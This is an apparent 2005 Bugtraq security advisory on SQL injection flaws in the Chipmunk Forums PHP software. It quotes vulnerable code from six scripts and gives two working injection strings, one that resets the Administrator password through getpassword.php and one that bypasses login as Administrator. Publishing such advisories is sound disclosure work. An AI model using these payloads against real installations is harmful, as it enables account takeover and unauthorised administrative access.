SQL injection in Chipmunk forums

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL injection in Chipmunk forums
From: foster GHC <foster@xxxxxx>
Date: 9 Feb 2005 07:13:25 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


/*==========================================*/
// GHC -> Chipmunk forum <- ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/

[1] script name: getpassword.php

---[code]---
if(isset($_POST['submit']))
{
  $email=$_POST['email'];
  $getinfo="SELECT * from b_users where email='$email'";
  ...
mail("$email","Your Forum password","Your forum password has been set to 
$value");
---[/code]---

[exploit]
ghc@xxxxxx' or username='Administrator
this action will change password for Administrator without notification

[note]
"Administrator" must be a valid user name.

[2] script name: authenticate.php

---[code]---
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and 
password='$password' and 
validated='1'"; 
---[/code]---

[exploit]
at login.php enter user name as
Administrator'/*

[3] script name: edit.php

---[code]---
 if(isset($_POST['ID']))
{
  $ID=$_POST['ID'];
}
else
{
  $ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author 
and 
b_posts.ID='$ID'";
---[code]---

Possible SQL injection through $ID variable.

[4] search.php

---[code]---
  $searchterm=$_POST['searchterm'];
  $getthreads="SELECT * from b_posts where  post like '%$searchterm%' and 
threadparent='0' 
order by telapsed DESC limit $start, 50";
---[/code]---

Possible SQL injection through $searchterm.

[5] newtopic.php

---[code]---
       $name=$_POST['name'];
       $title=$_POST['title'];
       $post=$_POST['post'];
       $day=date("D M d, Y H:i:s");
       $timegone=date("U") ;
       if($_POST['nosmiley'])
...
       $name=strip_tags($name);
       $title=strip_tags($title);       
       $post=strip_tags($post);              
       $posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, 
postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', 
'$day', 
'$timegone','$forumID','$user','$nosmiley','$s')";
       mysql_query($posting) or die("could not post");
---[/code]---

Possible SQL injection  through $name, $title, $post.

[6] reguser.php 

---[code 1]---
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";

---[code 2]---

if ($password==$pass2 && $_POST['password'])
{
 ...
$SQL ="INSERT into b_users (username,password,sig, 
email,location,AIM,ICQ,showprofile,validated) values
('$username','$password','$signature','$email','$location','$aim','$icq','$showprofile','1')
";
    mysql_query($SQL) or die(mysql_error());
 ---[/code]---

Possible SQL injection through registration form's variables.

Find a lot of bugs in usercp.php, reply.php, quote.php and others by yourself.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */

Prev by Date: Paper: Solution to Red Hat PIE Protection
Next by Date: CMS Core SQL injection
Previous by thread: Paper: Solution to Red Hat PIE Protection
Next by thread: CMS Core SQL injection
Index(es):
- Date
- Thread